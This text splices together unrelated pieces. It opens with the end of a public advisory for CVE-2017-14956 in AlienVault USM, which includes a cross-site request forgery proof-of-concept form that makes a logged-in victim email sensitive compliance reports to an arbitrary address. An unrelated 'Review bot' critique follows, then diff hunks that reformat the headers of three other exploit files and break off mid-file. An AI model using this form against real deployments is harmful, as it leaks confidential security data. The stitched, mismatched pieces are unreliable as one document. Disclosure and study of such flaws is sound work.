<body>
<form action="https://example.com/ossim/report/wizard_email.php";>
<input type="hidden" name="extra&#95;data" value="1" />
<input type="hidden" name="name" value="UENJX0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw&#61;&#61;" />
<input type="hidden" name="format" value="email" />
<input type="hidden" name="pdf" value="true" />
<input type="hidden" name="email" value="email&#64;example&#46;com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
6. RISK
=======
To successfully exploit this vulnerability a user with rights to access the
compliance reports must be tricked into visiting an arbitrary website while
having an authenticated session in the application.
The vulnerability allows remote attackers to trigger a report generation and
send the report out to an arbitrary email address, which may lead to the
disclosure of very sensitive internal reporting information stored in AlienVault
USM through pre-defined reports such as:
- Alarms
- Assets Inventory
- Compliance Reports such as PCI DSS and HIPAA
- Raw Logs
- Security Events
- Security Operations
- Tickets
- User Activity
7. SOLUTION
===========
None.
8. REPORT TIMELINE
==================
2017-09-22: Discovery of the vulnerability
2017-09-22: Sent full vulnerability details to publicly listed security email
address
2016-10-01: MITRE assigns CVE-2017-14956
2017-10-03: No response from vendor, notified vendor again
2017-10-13: No response from vendor
2017-10-13: Public disclosure according to disclosure policy
9. REFERENCES
=============
https://www.rcesecurity.com/2017/10/cve-2017-14956-alienvault-usm-leaks-sensitive-compliance-information-via-csrf
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14956
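Review bot: the advisory header classifies the issue as "Cross-Site Request Forgery [CWE-253]", but CWE-253 is "Incorrect Check of Function Return Value"; CSRF is CWE-352. In the timeline, "2016-10-01: MITRE assigns CVE-2017-14956" has the wrong year, since it sits between the 2017-09-22 report and the 2017-10-03 follow-up. The PoC `<form action="https://example.com/ossim/report/wizard_email.php";>` also carries a stray `;` after the closing quote, a mailing-list artifact that should be dropped.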

@ -1,8 +1,10 @@
source : http://www.securityfocus.com/bid/1967/info
/*
source: http://www.securityfocus.com/bid/1967/info
Koules is an original, arcade-style game authored by Jan Hubicka. The version using svgalib is usually installed setuid root so that it may access video hardware when being run at the console by regular users. This version contains a buffer overflow vulnerability that may allow a user to gain higher priviledges. The vulnerability exists in handling of user-supplied commandline arguments.
Successful exploitation of this vulnerability leads to root compromise. Debian has announced they are not vulnerable to this problem.
*/
/*

@ -1,10 +1,11 @@
source: http://www.securityfocus.com/bid/43502/info
BS.Player is prone to multiple remote denial-of-service vulnerabilities.
An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.
BS.Player 2.56 is vulnerable; other versions may also be affected.
# source: http://www.securityfocus.com/bid/43502/info
#
# BS.Player is prone to multiple remote denial-of-service vulnerabilities.
#
# An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.
#
# BS.Player 2.56 is vulnerable; other versions may also be affected.
#
#!/usr/bin/python
#

@ -1,10 +1,11 @@
source:http://www.securityfocus.com/bid/548/info
A vulnerability affects Microsoft's Jet 3.51 and 4.0 driver (MSJET35.DLL and MSJET40.DLL).
This vulnerability could allow an attacker to create malicious '.xls' or '.doc' files incorporating VBA shell commands. When the file is opened, the shell commands contained in the file will execute on the target system. Command execution will occur in the context of the user that is opening the file.
The file could be distributed via email, the web (including in hidden frames), or any number of methods.
# source: http://www.securityfocus.com/bid/548/info
#
# A vulnerability affects Microsoft's Jet 3.51 and 4.0 driver (MSJET35.DLL and MSJET40.DLL).
#
# This vulnerability could allow an attacker to create malicious '.xls' or '.doc' files incorporating VBA shell commands. When the file is opened, the shell commands contained in the file will execute on the target system. Command execution will occur in the context of the user that is opening the file.
#
# The file could be distributed via email, the web (including in hidden frames), or any number of methods.
#
<HTML>
<HEAD>